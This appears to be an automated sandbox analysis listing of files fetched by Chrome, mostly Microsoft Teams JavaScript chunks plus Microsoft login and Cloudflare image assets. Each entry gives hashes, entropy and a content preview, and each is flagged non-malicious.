                                                                                                                                                                                                                                                                            Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[428348],{428348:(e,L,a)=>{a.d(L,{s:()=>n});var s=a(513432),t=a(395225),C=a.n(t),l=a(485529),c=a(829289),n=(0,l.Ke)({svg:function(e){var L=e.classes;return s.createElement("svg",{role:"presentation",focusable:"false",viewBox:"2 2 16 16",className:L.svg},s.createElement("path",{className:C()(c.Q.outline,L.outlinePart),d:"M15.5 16.9989C15.7761 16.9989 16 17.2227 16 17.4989C16 17.7443 15.8231 17.9485 15.5899 17.9908L15.5 17.9989H4.5C4.22386 17.9989 4 17.775 4 17.4989C4 17.2534 4.17688 17.0493 4.41012 17.0069L4.5 16.9989H15.5ZM10.0001 2.0011C10.2456 2.0011 10.4497 2.1781 10.492 2.41137L10.5 2.50124L10.496 14.2951L14.1414 10.6468C14.3148 10.473 14.5842 10.4535 14.7792 10.5883L14.8485 10.6461C15.0222 10.8195 15.0418 11.0889 14.907 11.2839L14.8492 11.3532L10.3574 15.8532C10.285 15.9259 10.1957 15.9715 10.1021 15.9902L9.99608 16C9.83511 16 9.69192 15.9239 9.60051 15.8057L5.14386 11.35
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (9340)
                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                            Size (bytes):9448
                                                                                                                                                                                                                                                                            Entropy (8bit):4.523377967026933
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:192:eb1U2QgAsRxHbQsnU5SFHL4VG9TCE+gLAq:aJnUAhTL+gLAq
                                                                                                                                                                                                                                                                            MD5:7C8D3065F041AC3BB96AD2BB1F69A97D
                                                                                                                                                                                                                                                                            SHA1:90E10AB01E7ACA5F96C70479884CF6C9E96B932F
                                                                                                                                                                                                                                                                            SHA-256:2A5643B209D4B26EBC41F5BF81AB5E43F8E492F2E812ACF4702874E72C831698
                                                                                                                                                                                                                                                                            SHA-512:88C3A8887AAC6EF11F06B64014EEDEF161F216440B59CC21404D4DC6ED3248364038ADB233A294072D99522341524B5EB4598CD34E8E442057BECE4F9587C955
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[668172],{668172:(a,l,Z)=>{Z.d(l,{ISY:()=>e,iFL:()=>h,FBb:()=>M,RIf:()=>m,p2G:()=>r,_PZ:()=>i,KDG:()=>v,a37:()=>A,NUc:()=>U,zPg:()=>V,hVM:()=>H,n1E:()=>d,umr:()=>u,E3C:()=>g,ao$:()=>t,nP9:()=>L,nat:()=>R,x3b:()=>C,Hee:()=>E,DRY:()=>F,G4r:()=>s,K$:()=>o,wvY:()=>n,Ppp:()=>_,tDd:()=>p,zDe:()=>f});var c=Z(693935);const e=(0,c.U)("Edit16Filled","16",["M10.53 1.76a2.62 2.62 0 1 1 3.7 3.71l-.77.78-3.71-3.7.78-.79ZM9.04 3.25 2.66 9.64c-.38.37-.64.84-.78 1.35l-.86 3.39a.5.5 0 0 0 .6.6l3.39-.86c.51-.14.98-.4 1.35-.78l6.39-6.38-3.7-3.71Z"]),h=(0,c.U)("Edit16Regular","16",["M14.24 1.76a2.62 2.62 0 0 0-3.71 0L2.66 9.64c-.38.37-.64.84-.78 1.35l-.86 3.39a.5.5 0 0 0 .6.6l3.39-.86c.51-.14.98-.4 1.35-.78l7.88-7.87a2.62 2.62 0 0 0 0-3.7Zm-3 .71a1.62 1.62 0 1 1 2.29 2.3l-.78.77-2.3-2.29.79-.78ZM9.75 3.96l2.3 2.29-6.4 6.39c-.24.24-.55.42-.89.5l-2.57.67.66-2.57c.09-.34.27-.65.51-.9l6.39-6.38Z"]),M=
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                            Size (bytes):174887
                                                                                                                                                                                                                                                                            Entropy (8bit):5.321105004539833
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:3072:VIOrThlUC2xVJPohO+3CGKhquKln5EWmgc:uOPhp2xVJPohO+SG5Ygc
                                                                                                                                                                                                                                                                            MD5:655691506915B9BFF693016B849E2857
                                                                                                                                                                                                                                                                            SHA1:D5785A2A40FD4048E05CD9F82D032A97C6FA89FE
                                                                                                                                                                                                                                                                            SHA-256:776FC77C37BFC3100BDBD76F016580FD63D8F9CC969A06031B59EB7FEBA46B2F
                                                                                                                                                                                                                                                                            SHA-512:206E27B1CA4A8634515713F3F3136DC7AE00AFF343DB67167DD3DF44D86FC54710451A31C9FDA956BFDB2D1E66C66E0DA13BBDDB480A5E89A88652FA2785F004
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[71987],{923226:(e,t,n)=>{var i,a,r,o,s;n.d(t,{IO:()=>i,Wx:()=>a,$b:()=>r,BV:()=>o,fP:()=>s,lV:()=>d,p$:()=>l}),function(e){e.POP="pop",e.BEARER="Bearer"}(i||(i={})),function(e){e[e.Skype=0]="Skype",e[e.AAD=1]="AAD",e[e.CAE=2]="CAE"}(a||(a={})),function(e){e[e.Error=0]="Error",e[e.Warning=1]="Warning",e[e.Info=2]="Info",e[e.Verbose=3]="Verbose"}(r||(r={})),function(e){e.ag08="ag08",e.ag09="ag09",e.dod="dod",e.gcc="gcc",e.gcchigh="gcchigh",e.life="life",e.prod="prod"}(o||(o={})),function(e){e.LOKI_TFL_AUTH_TOKEN_AUDIENCE="liveprofilecard.access",e.MT="https://api.spaces.skype.com",e.GROUPS_SERVICE="https://groupssvc.fl.teams.microsoft.com/teams.readwrite",e.AAD_V2_TFL="https://mtsvc.fl.teams.microsoft.com/teams.mt.readwrite",e.UNIFIED_CONSENT_WEB_AUTH_URL="https://consentservice.microsoft.com/web/UnifiedUserConsent.ReadWrite",e.UNIFIED_CONSENT_CHECKIN_AUTH_URL="https://consents
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (64616)
                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                            Size (bytes):449972
                                                                                                                                                                                                                                                                            Entropy (8bit):5.448633694424365
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:6144:07PuGBhXlRK2d/ZkpZYRsmA2pmBe9OpRUS4cEHKE0H3NX44y:07DBZkp6umhpsUSuZ
                                                                                                                                                                                                                                                                            MD5:87A4DD68AE9C7ECAE0D7BE70E3B69108
                                                                                                                                                                                                                                                                            SHA1:86318331A5FAAE3B2430A9F8137CC817741ACE96
                                                                                                                                                                                                                                                                            SHA-256:0030E7479CDC07327AA070FE746F5B2ECD366CE3A6EE1E9E83547DC7703A59E4
                                                                                                                                                                                                                                                                            SHA-512:F715E26312AF1CE8F1E5396CE61CBB5CCF227ED364F09D06FA59CEAA115C28DD77170750F0FF3C2E250F836AB6F562D4EFB3A8F19B91D72A0F34865BEB0FD012
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            Preview:/*!. * ------------------------------------------- START OF THIRD PARTY NOTICE -----------------------------------------. * . * This file is based on or incorporates material from the projects listed below (Third Party IP). The original copyright notice and the license under which Microsoft received such Third Party IP, are set forth below. Such licenses and notices are provided for informational purposes only. Microsoft licenses the Third Party IP to you under the licensing terms for the Microsoft product. Microsoft reserves all other rights not expressly granted under this agreement, whether by implication, estoppel or otherwise.. * . * json2.js (2016-05-01). * https://github.com/douglascrockford/JSON-js. * License: Public Domain. * . * Provided for Informational Purposes Only. * . * ----------------------------------------------- END OF THIRD PARTY NOTICE ------------------------------------------. */!function(e){function n(n){for(var t,i,o=n[0],r=n[1],s=0,c=[];s<o.length;s++)
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (25864)
                                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                                            Size (bytes):25972
                                                                                                                                                                                                                                                                            Entropy (8bit):5.48597695089985
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:768:oVFeWjXDaRkYW2RdOh8AoxPBO/68cxi2pcaiGn/scPHiH2sNSE5dMj33/:IU10SP5l
                                                                                                                                                                                                                                                                            MD5:4688B4329ED2F5D20A7D44572488B666
                                                                                                                                                                                                                                                                            SHA1:8697904E227289A61B005D47BEA82645089DCA1C
                                                                                                                                                                                                                                                                            SHA-256:BB652F709A874011FF22BEE5719E2C163F326E20B797E75BCE173E2D66BD0287
                                                                                                                                                                                                                                                                            SHA-512:52036535EAE64B24F710681DBF6D4C0A4AAF28B116BD7FBBFC942045F653119169EBC694F4C2601690FB81CDFF8D83A6E21FC9164C815A36F3B67BE3FCE5E3F3
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            URL:https://statics.teams.cdn.office.net/teams-modular-packages/hashed-assets/334217-424fbc14c44cda15.js
                                                                                                                                                                                                                                                                            Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[334217],{122487:(e,t,n)=>{n.d(t,{GW:()=>w,LY:()=>S,Fo:()=>j,Gx:()=>T,wU:()=>k});var o=n(332752),i=n(881360),a=n(727572),r=n(127066),s=n(757060),c=n(483330),d=n(751067),l=n(37868),m=n(771477),u=n(825268),g=n(969414),f=n(362328);const p={kind:"Document",get definitions(){const e=(0,f.G)("fragment ComponentsSkypeEmoticonCustomEmojiCategoryFragment on EmojiCategory {id,title,count}");return delete this.definitions,this.definitions=e.definitions}},h={kind:"Document",get definitions(){const e=(0,f.G)("query ComponentsSkypeEmoticonCustomEmojiCategoryQuery($includeCategories:Boolean) {emojiSearch(includeCategories:$includeCategories) {... on EmojiCategoryConnection {edges {node {...ComponentsSkypeEmoticonCustomEmojiCategoryFragment}}}}}");return delete this.definitions,this.definitions=[...e.definitions,...p.definitions]}};var b=n(8607),C=n(236347),y=n(956400),v=n(573990),E=n(487132)
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                                            Size (bytes):1864
                                                                                                                                                                                                                                                                            Entropy (8bit):5.222032823730197
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:48:yvswNIBLBpJawmMH44log6gw/MHm7pJroog6gwkMH9Xog6gwdMHdqdyqog7C:ykfXYx+odPcs9B
                                                                                                                                                                                                                                                                            MD5:BC3D32A696895F78C19DF6C717586A5D
                                                                                                                                                                                                                                                                            SHA1:9191CB156A30A3ED79C44C0A16C95159E8FF689D
                                                                                                                                                                                                                                                                            SHA-256:0E88B6FCBB8591EDFD28184FA70A04B6DD3AF8A14367C628EDD7CABA32E58C68
                                                                                                                                                                                                                                                                            SHA-512:8D4F38907F3423A86D90575772B292680F7970527D2090FC005F9B096CC81D3F279D59AD76EAFCA30C3D4BBAF2276BBAA753E2A46A149424CF6F1C319DED5A64
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            URL:https://aadcdn.msftauth.net/shared/1.0/content/images/backgrounds/2_11d9e3bcdfede9ce5ce5ace2d129f1c4.svg
                                                                                                                                                                                                                                                                            Preview:<svg xmlns="http://www.w3.org/2000/svg" width="1920" height="1080" fill="none"><g opacity=".2" clip-path="url(#E)"><path d="M1466.4 1795.2c950.37 0 1720.8-627.52 1720.8-1401.6S2416.77-1008 1466.4-1008-254.4-380.482-254.4 393.6s770.428 1401.6 1720.8 1401.6z" fill="url(#A)"/><path d="M394.2 1815.6c746.58 0 1351.8-493.2 1351.8-1101.6S1140.78-387.6 394.2-387.6-957.6 105.603-957.6 714-352.38 1815.6 394.2 1815.6z" fill="url(#B)"/><path d="M1548.6 1885.2c631.92 0 1144.2-417.45 1144.2-932.4S2180.52 20.4 1548.6 20.4 404.4 437.85 404.4 952.8s512.276 932.4 1144.2 932.4z" fill="url(#C)"/><path d="M265.8 1215.6c690.246 0 1249.8-455.595 1249.8-1017.6S956.046-819.6 265.8-819.6-984-364.005-984 198-424.445 1215.6 265.8 1215.6z" fill="url(#D)"/></g><defs><radialGradient id="A" cx="0" cy="0" r="1" gradientUnits="userSpaceOnUse" gradientTransform="translate(1466.4 393.6) rotate(90) scale(1401.6 1720.8)"><stop stop-color="#107c10"/><stop offset="1" stop-color="#c4c4c4" stop-opacity="0"/></radialGradient><r
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (18459)
                                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                                            Size (bytes):18567
                                                                                                                                                                                                                                                                            Entropy (8bit):5.392203233495941
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:384:LAi3uZJIFAgk156FIFhmIJnHBxXX82oXR:LV3uaTktBBZWR
                                                                                                                                                                                                                                                                            MD5:F1E2E125B6A655A912A2732F8DD84774
                                                                                                                                                                                                                                                                            SHA1:19F8C0FC642A97EDD95E7A4623CF81221E2DFDA1
                                                                                                                                                                                                                                                                            SHA-256:F3AE7ECE0106D467F5664C8865AF069E73CBB617BDEC69AE925DF65C516C3E7F
                                                                                                                                                                                                                                                                            SHA-512:92ECB71EC56F834B32B49DC3B45CFF1E5345C32C7919B0BB6B602A55B62B1E5A2669F13CF220233B29A2E646D2CC0E1E85237542ECA3DF01CA03C5148C725C40
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            URL:https://statics.teams.cdn.office.net/teams-modular-packages/hashed-assets/196395-04975d44a0a148a8.js
                                                                                                                                                                                                                                                                            Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[196395],{692934:(e,n,t)=>{t.d(n,{J4:()=>c,Dl:()=>h,On:()=>m,As:()=>C,Fd:()=>s,L2:()=>p,Oi:()=>v,oU:()=>d,ge:()=>f,wI:()=>I,PX:()=>w,X4:()=>l,kL:()=>g,qP:()=>u});var a=t(938510),r="locale",i="ver",o="name",s=(0,a.o)({UserExt:[0,"user"],DeviceExt:[1,"device"],TraceExt:[2,"trace"],WebExt:[3,"web"],AppExt:[4,"app"],OSExt:[5,"os"],SdkExt:[6,"sdk"],IntWebExt:[7,"intweb"],UtcExt:[8,"utc"],LocExt:[9,"loc"],CloudExt:[10,"cloud"],DtExt:[11,"dt"]}),c=(0,a.o)({id:[0,"id"],ver:[1,i],appName:[2,o],locale:[3,r],expId:[4,"expId"],env:[5,"env"]}),u=(0,a.o)({domain:[0,"domain"],browser:[1,"browser"],browserVer:[2,"browserVer"],screenRes:[3,"screenRes"],userConsent:[4,"userConsent"],consentDetails:[5,"consentDetails"]}),l=(0,a.o)({locale:[0,r],localId:[1,"localId"],id:[2,"id"]}),d=(0,a.o)({osName:[0,o],ver:[1,i]}),f=(0,a.o)({ver:[0,i],seq:[1,"seq"],installId:[2,"installId"],epoch:[3,"epoch"]}),
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                                            Size (bytes):224064
                                                                                                                                                                                                                                                                            Entropy (8bit):5.130481619229709
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:3072:4HzKeBqX65uDTab5q6ob04mdMh5vy5Rd5/xxLq0FRhsB7451gO:4ATab54jh5vy5Rd5S0FRhS743h
                                                                                                                                                                                                                                                                            MD5:550D3C6898061451EB40B2FE79602ECF
                                                                                                                                                                                                                                                                            SHA1:BEFA3AFFE3672531AEC410DB9DE7BBFD77D58288
                                                                                                                                                                                                                                                                            SHA-256:55BE2581396C9BBF282D2D36840C5442FDE9F5A549BF5B906DCBDAEDB235FDEF
                                                                                                                                                                                                                                                                            SHA-512:A9C71BE48AC58D07BE3E8D483A28704D76650B7AB8D7487885C24FB07EA10438C9858D6543D3D8A4AC507D73777B36F73CC0ADEF17EF22C20DACA7A6BDCF4812
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            URL:https://statics.teams.cdn.office.net/teams-modular-packages/hashed-assets/917004-8b2b4dc7eb5cddc2.js
                                                                                                                                                                                                                                                                            Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[917004],{122454:(e,t,a)=>{var n;a.d(t,{A:()=>c});var i=new Uint8Array(16);function o(){if(!n&&!(n="undefined"!=typeof crypto&&crypto.getRandomValues&&crypto.getRandomValues.bind(crypto)||"undefined"!=typeof msCrypto&&"function"==typeof msCrypto.getRandomValues&&msCrypto.getRandomValues.bind(msCrypto)))throw new Error("crypto.getRandomValues() not supported. See https://github.com/uuidjs/uuid#getrandomvalues-not-supported");return n(i)}const r=/^(?:[0-9a-f]{8}-[0-9a-f]{4}-[1-5][0-9a-f]{3}-[89ab][0-9a-f]{3}-[0-9a-f]{12}|00000000-0000-0000-0000-000000000000)$/i;const _=function(e){return"string"==typeof e&&r.test(e)};for(var s=[],l=0;l<256;++l)s.push((l+256).toString(16).substr(1));const d=function(e){var t=arguments.length>1&&void 0!==arguments[1]?arguments[1]:0,a=(s[e[t+0]]+s[e[t+1]]+s[e[t+2]]+s[e[t+3]]+"-"+s[e[t+4]]+s[e[t+5]]+"-"+s[e[t+6]]+s[e[t+7]]+"-"+s[e[t+8]]+s[e[t+9]]+"-
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (35485)
                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                            Size (bytes):35593
                                                                                                                                                                                                                                                                            Entropy (8bit):5.433201153959229
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:768:BUd8hDG5Tf4TCvJIuyxof+JuJAXNh4ptwBKPQ7KcnwCVJp8FsnxMhRnA:KdgO0LXy+JuJAXNKp6BKPQJnwCRNxMha
                                                                                                                                                                                                                                                                            MD5:614CEF6A5591243EE327D5D2B7A2C698
                                                                                                                                                                                                                                                                            SHA1:A30288FE3D15BFEDC3E3B73B18A2ADA72BD43ABB
                                                                                                                                                                                                                                                                            SHA-256:8D81DC89757CB48425F7781F7FB889913FD959E96F977CA03F2BF19C571D9B72
                                                                                                                                                                                                                                                                            SHA-512:A37C171BE9894AA1EEA99374626498E734F9D3A632FEEB41E308D6D2142FBBB99CE48B101F29EA87FD7C736BC4300686371C755D56A828BCED9C5013B7CA0F1D
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[972276],{296920:(e,t,n)=>{n.d(t,{e:()=>y,y:()=>I});var i=n(689054),r=n(305573);function s(e,t){for(var n,i=/\r\n|[\n\r]/g,r=1,s=t+1;(n=i.exec(e.body))&&n.index<t;)r+=1,s=t+1-(n.index+n[0].length);return{line:r,column:s}}function a(e){return o(e.source,s(e.source,e.start))}function o(e,t){var n=e.locationOffset.column-1,i=u(n)+e.body,r=t.line-1,s=e.locationOffset.line-1,a=t.line+s,o=1===t.line?n:0,l=t.column+o,p="".concat(e.name,":").concat(a,":").concat(l,"\n"),h=i.split(/\r\n|[\n\r]/g),f=h[r];if(f.length>120){for(var d=Math.floor(l/80),E=l%80,v=[],N=0;N<f.length;N+=80)v.push(f.slice(N,N+80));return p+c([["".concat(a),v[0]]].concat(v.slice(1,d+1).map((function(e){return["",e]})),[[" ",u(E-1)+"^"],["",v[d+1]]]))}return p+c([["".concat(a-1),h[r-1]],["".concat(a),f],["",u(l-1)+"^"],["".concat(a+1),h[r+1]]])}function c(e){var t=e.filter((function(e){e[0];return void 0!==e[1]})),n
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:PNG image data, 22 x 13, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                                            Size (bytes):61
                                                                                                                                                                                                                                                                            Entropy (8bit):4.022997040570905
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:3:yionv//thPlrytntHp/1xl/k4E08up:6v/lhP0ttJ/17Tp
                                                                                                                                                                                                                                                                            MD5:0CA03005E9A93237B42EFFE101812AE8
                                                                                                                                                                                                                                                                            SHA1:B2B45EB134B9CE362C303E311FBAA16A1A9D5109
                                                                                                                                                                                                                                                                            SHA-256:C43D09024784097C74BEA1E895D2DE28E73B05F6804C38BFB72A5A12D4391B76
                                                                                                                                                                                                                                                                            SHA-512:53699D6F19FAE1B962194D642F3190A776D6A896B56F37F6C38CBC9B3D966A00C2ABA37070AC6D116E9E7EA8016037B68CD49005A2A5D2A32A35C0BC87DDE739
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            URL:https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/i/8ec5727f9d0241a1/1733248736475/wS--9DjAkAOpF5i
                                                                                                                                                                                                                                                                            Preview:.PNG........IHDR............."..4....IDAT.....$.....IEND.B`.
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:GIF image data, version 89a, 352 x 3
                                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                                            Size (bytes):3620
                                                                                                                                                                                                                                                                            Entropy (8bit):6.867828878374734
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:48:ZumKaT5ezv47j2/ZiRDlq16x8XvEUcg777shHdpHVGJqFd:Eal647jPDlL8XvEUcg77kVGyd
                                                                                                                                                                                                                                                                            MD5:B540A8E518037192E32C4FE58BF2DBAB
                                                                                                                                                                                                                                                                            SHA1:3047C1DB97B86F6981E0AD2F96AF40CDF43511AF
                                                                                                                                                                                                                                                                            SHA-256:8737D721808655F37B333F08A90185699E7E8B9BDAAA15CDB63C8448B426F95D
                                                                                                                                                                                                                                                                            SHA-512:E3612D9E6809EC192F6E2D035290B730871C269A267115E4A5515CADB7E6E14E3DD4290A35ABAA8D14CF1FA3924DC76E11926AC341E0F6F372E9FC5434B546E5
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            URL:https://aadcdn.msftauth.net/shared/1.0/content/images/marching_ants_986f40b5a9dc7d39ef8396797f61b323.gif
                                                                                                                                                                                                                                                                            Preview:GIF89a`.........iii!.......!.&Edited with ezgif.com online GIF maker.!..NETSCAPE2.0.....,....`.....6......P.l.......H....I..:qJ......k....`BY..L*..&...!.......,....`.....9..i....Q4......H..j.=.k9-5_..........j7..({.........!.......,....`.....9.......trV.......H....`.[.q6......>.. .CZ.&!.....M...!.......,....`.....8..........:......H..jJ..U..6_....../.el...q.)...*..!.......,....`.....9.....i..l.go.....H..*".U...f......._......5......n..!.......,....`.....:..i......./.....H...5%.kE/5.........In.a..@&3.....J...!.......,....`.....9.......kr.j.....H..*.-.{Im5c..............@&.........!.......,....`.....9.........j..q....H...].&..\.5.........8..S..........!.......,....`.....9.......3q.g..5....H...:u..............Al..x.q.........!.......,....`.....9......\.F....z....H...zX...ov.........h3N.x4......j..!.......,....`.....9........Q.:......H....y..^...1.........n.!.F......E...!.......,....`.....8.........i,......H....*_.21.I.........%...
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                                            Size (bytes):111660
                                                                                                                                                                                                                                                                            Entropy (8bit):4.389242119594684
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:3072:ZevuH9Xq2DtYoZIVbgG0mcJpHo9HqXSWcYfAZe8Hc2bLn4+JNeaJ7uXD/:BhZIVbgG05D3DO0S4
                                                                                                                                                                                                                                                                            MD5:509FABFDC5746F4327E1120C07006B11
                                                                                                                                                                                                                                                                            SHA1:FB0755BC615C83D3544F5DC61262A5A9B09C6F98
                                                                                                                                                                                                                                                                            SHA-256:D4303779255C3F002668E0FE5F755F5807C246EA8D8FC1D453EA92CF8F98184B
                                                                                                                                                                                                                                                                            SHA-512:DBE42F517AB3C4CE9FC6CF847B9FC87DC49FB51E3330F689B183EE58F9C1E46EBFB2B6373C77FA901EFA1F4AE9DB06AB444D7A5F90CBEEEB67993B2153495839
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            URL:https://statics.teams.cdn.office.net/teams-modular-packages/hashed-assets/378200-f58c4c12c400a26d.js
                                                                                                                                                                                                                                                                            Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[378200],{378200:(a,l,Z)=>{Z.d(l,{bBY:()=>h,lt0:()=>c,yOJ:()=>m,gT3:()=>v,BqX:()=>M,B$Y:()=>H,xBE:()=>A,n7r:()=>r,fZ1:()=>V,dDX:()=>i,FEK:()=>U,$Ke:()=>d,nX0:()=>u,BJl:()=>n,wlb:()=>L,qEH:()=>R,xU9:()=>t,NfP:()=>o,u50:()=>S,wIv:()=>g,mFV:()=>F,eFJ:()=>s,TXX:()=>P,bkw:()=>C,mKe:()=>p,qW2:()=>f,eH5:()=>k,ad_:()=>b,fQJ:()=>y,D$b:()=>O,ifC:()=>T,mtw:()=>w,WGt:()=>B,y2l:()=>x,zPH:()=>q,d5R:()=>I,xPN:()=>D,dGC:()=>E,QOI:()=>N,iN6:()=>J,opr:()=>Q,aUx:()=>X,HC5:()=>K,vpp:()=>_,maG:()=>j,MJQ:()=>W,BHV:()=>G,VC0:()=>Y,CQz:()=>$,uqx:()=>z,sPT:()=>aa,OYi:()=>la,Q7X:()=>Za,cX9:()=>ea,tvn:()=>ha,VeZ:()=>ca,OoO:()=>ma,eEF:()=>va,FfV:()=>Ma,bBX:()=>Ha,I7h:()=>Aa,WiT:()=>ra,jU7:()=>Va,jNX:()=>ia,Luu:()=>Ua,Zi6:()=>da,g6R:()=>ua,cKq:()=>na,b$F:()=>La,OfM:()=>Ra,zw9:()=>ta,nbT:()=>oa,oV5:()=>Sa,K4g:()=>ga,UEw:()=>Fa,E68:()=>sa,pXb:()=>Pa,tmX:()=>Ca,VIN:()=>pa,tBY:()=>fa,ktJ:()=>ka,sH_:()=>ba,V3L
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (1278)
                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                            Size (bytes):1386
                                                                                                                                                                                                                                                                            Entropy (8bit):5.130362677219664
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:24:wp3sp38qMS7y8FskQhyKFfuR/uEcrW5Wg1vvvySQd+qpeM6km6QPTOYb/d:wp3sp3zMS79s7Ffx65Wg6ekxAr/d
                                                                                                                                                                                                                                                                            MD5:175F9CE0D50E2DE6768A229535D48F23
                                                                                                                                                                                                                                                                            SHA1:E94A55A1B95BB9A565B5B0996922E9D3B1194CC5
                                                                                                                                                                                                                                                                            SHA-256:FCD8450132708D00246BEA0E5C712C2592D553370B5A155C74BD453E850D3B82
                                                                                                                                                                                                                                                                            SHA-512:9B7099CDE88F65E918B973F22959885CA7264881ACE0CA3A7A2D3F76FB3CCAEADCC778C5AE2FBA1A86C00BD22B4953B1EC3DD413544F53ED58ED911022236168
                                                                                                                                                                                                                                                                            Malicious:false
